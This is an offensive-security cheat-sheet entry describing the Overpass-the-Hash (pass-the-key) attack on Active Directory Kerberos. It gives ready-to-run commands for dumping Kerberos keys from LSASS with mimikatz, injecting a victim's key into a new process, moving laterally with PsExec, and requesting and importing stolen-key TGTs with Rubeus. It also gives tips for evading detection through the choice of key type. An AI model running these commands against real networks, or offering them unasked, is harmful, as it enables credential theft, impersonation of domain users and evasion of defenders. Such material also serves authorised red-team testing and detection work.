Overpass the Hash
Also called pass-the-key. It needs the user's actual Kerberos key, not a captured NTLMv1/NTLMv2 challenge-response: the NT hash is the RC4-HMAC key (etype 23), while the AES128/AES256 keys are derived separately from the password and cannot be computed from the hash.
Turn a Kerberos key of a domain user into a Kerberos ticket-granting ticket (TGT) by using the key as the pre-authentication secret in an AS-REQ, then authenticate with that TGT. The password itself is never needed. The TGT is placed in a logon session on the host where it was requested; to use it from another host you export it and pass the ticket.
Requires administrator privileges (mimikatz reads keys out of LSASS)
View Kerberos Keys
.\mimikatz.exe
> privilege::debug
> sekurlsa::ekeys
# lists rc4_hmac_nt (same value as the NT hash), aes128_hmac and aes256_hmac per logon session
Spawn a new process whose logon session carries the victim's key. The process still runs as your local user; only its Kerberos authentication to the domain is done as the victim.
> sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<KEY/NTLM> [/run:Powershell.exe]
Instead of /ntlm you can pass /rc4 (same value as the NT hash), /aes128 or /aes256. Prefer an AES key when you have one: a TGT requested with RC4 (ticket encryption type 0x17 in the DC's 4768 event) from an account or host that normally uses AES is a common detection for this technique.
In the new terminal Kerberos authentication now happens as the victim, so the following work against hosts the victim has access to. Address the target by host name, not IP address, otherwise NTLM is negotiated instead of Kerberos and the injected key is not used. The TGT is only requested on first use, so it shows up in klist after the first network access.
net use \\<ComputerName>
PsExec.exe -accepteula \\<ComputerName> cmd.exe
Does not require administrator privileges (Rubeus)
Request a new TGT for the user with their key, print it, then import it into the current logon session (much like replaying a stolen cookie). Importing replaces the TGT already in that session, so run this from a sacrificial logon session (for example one started with runas /netonly) if you want to keep your own context.
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /nowrap
# printed in base64
.\Rubeus.exe ptt /ticket:<BASE64_TICKET>
Or request the TGT and import it in one step, without printing it:
.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLMHash> /ptt
Instead of /rc4 you can pass /aes128, /aes256 or /des, matching the key type you hold. The same OPSEC point applies: an RC4 (0x17) or DES TGT request stands out where AES is the norm, and DES encryption types are disabled by default on current domain controllers.